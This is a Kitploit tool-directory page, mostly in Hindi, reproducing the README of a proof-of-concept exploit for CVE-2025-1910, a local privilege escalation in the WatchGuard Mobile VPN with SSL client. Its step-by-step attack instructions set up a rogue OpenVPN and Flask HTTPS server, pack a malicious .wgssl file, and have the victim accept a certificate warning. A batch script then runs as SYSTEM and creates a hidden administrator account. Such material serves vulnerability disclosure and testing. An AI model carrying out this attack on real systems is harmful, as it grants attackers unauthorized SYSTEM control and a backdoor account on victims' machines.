Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1910-WatchGuard-Privilege-Escalation — CVE-2025-1910 का शोषण करने के लिए Proof-of-Concept, जो Watchguard's Mobile VPN with SSL client के भीतर एक स्थानीय विशेषाधिकार वृद्धि है। | Kitploit
उपकरण/GitHubGitHub/lutrasecurity/cve-2025-1910-watchguard-privilege-escalation
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHublutrasecurity/cve-2025-1910-watchguard-privilege-escalation

CVE-2025-1910-WatchGuard-Privilege-Escalation

CVE-2025-1910 का शोषण करने के लिए Proof-of-Concept, जो Watchguard's Mobile VPN with SSL client के भीतर एक स्थानीय विशेषाधिकार वृद्धि है।

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

WatchGuard Mobile VPN with SSL के साथ क्लाइंट विशेषाधिकार वृद्धि (CVE-2025-1910)

WatchGuard के Mobile VPN with SSL <= 12.11.2 में एक विशेषाधिकार वृद्धि कमजोरी एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता को क्लाइंट पर SYSTEM के रूप में कमांड निष्पादित करने की अनुमति देती है। Mobile VPN with SSL संस्करण 12.11.2 के साथ परीक्षण किया गया।

अधिक जानकारी के लिए, हमारा ब्लॉग लेख देखें (जर्मन संस्करण).

शोषण

हमलावर सर्वर पर तैयारी

  1. एक OpenVPN सर्वर शुरू करें जो सभी कनेक्शन स्वीकार करता है:
root@kitploit:~
sudo openvpn --config server.conf

Started OpenVPN server.

  1. ./client/client.ovpn में remote विकल्प को संशोधित करें ताकि वह OpenVPN सर्वर की ओर इंगित करे

  2. ./client/run.bat को अपनी पसंद के अनुसार संशोधित करें, यह स्क्रिप्ट SYSTEM के रूप में निष्पादित होगी। डिफ़ॉल्ट रूप से, एक नया व्यवस्थापक उपयोगकर्ता बनाया जाता है (shinyNewAdmin)

  3. दुर्भावनापूर्ण WatchGuard client.wgssl फ़ाइल बनाएं:

root@kitploit:~
cd client/

# Create checksum
md5sum client.ovpn run.bat > MD5SUM

# Pack into a .wgssl file
tar -czf ../client_exploit.wgssl client.ovpn  MD5SUM  run.bat

cd ..
  1. दुर्भावनापूर्ण client.wgssl फ़ाइल को flask के माध्यम से परोसें:
root@kitploit:~
# Start the flask HTTPS server
sudo python3 srv.py

Started the flask web server.

वैकल्पिक रूप से, openssl के माध्यम से एक नया प्रमाणपत्र और कुंजी जोड़ा बनाया जा सकता है:

root@kitploit:~
# Create certificate and private key for the HTTPS connection
openssl req -x509 -newkey rsa:4096 -nodes -out server.crt -keyout server.key -days 365 -subj "/CN=firebox"

पीड़ित मशीन पर शोषण

फिर, पीड़ित मशीन पर जहां Mobile VPN with SSL का एक कमजोर संस्करण स्थापित है (जैसे संस्करण 12.11.2, डाउनलोड), हमलावर सर्वर से कनेक्ट करने का प्रयास करें। दर्ज किया गया उपयोगकर्ता नाम और पासवर्ड मायने नहीं रखता:

Connecting to the attacker server.

सुरक्षा चेतावनी पर हाँ क्लिक करें ताकि प्रमाणपत्र चेतावनियों को अनदेखा किया जा सके:

Connecting to the attacker server.

कनेक्शन सफलतापूर्वक स्थापित होने के बाद, run.bat फ़ाइल निष्पादित होती है और shinyNewAdmin उपयोगकर्ता बनाया जाता है:

The shinyNewAdmin user was created.

सेटअप

हमलावर सर्वर पर आपको Python, openssl और openvpn स्थापित होना चाहिए। इसके अतिरिक्त, flask Python पैकेज स्थापित होना चाहिए:

root@kitploit:~
pip install -r requirements.txt

निक्स फ्लेक

Nix स्थापित होने पर, आप केवल डेवलपमेंट शेल शुरू कर सकते हैं:

root@kitploit:~
nix develop
टूल डाउनलोड करें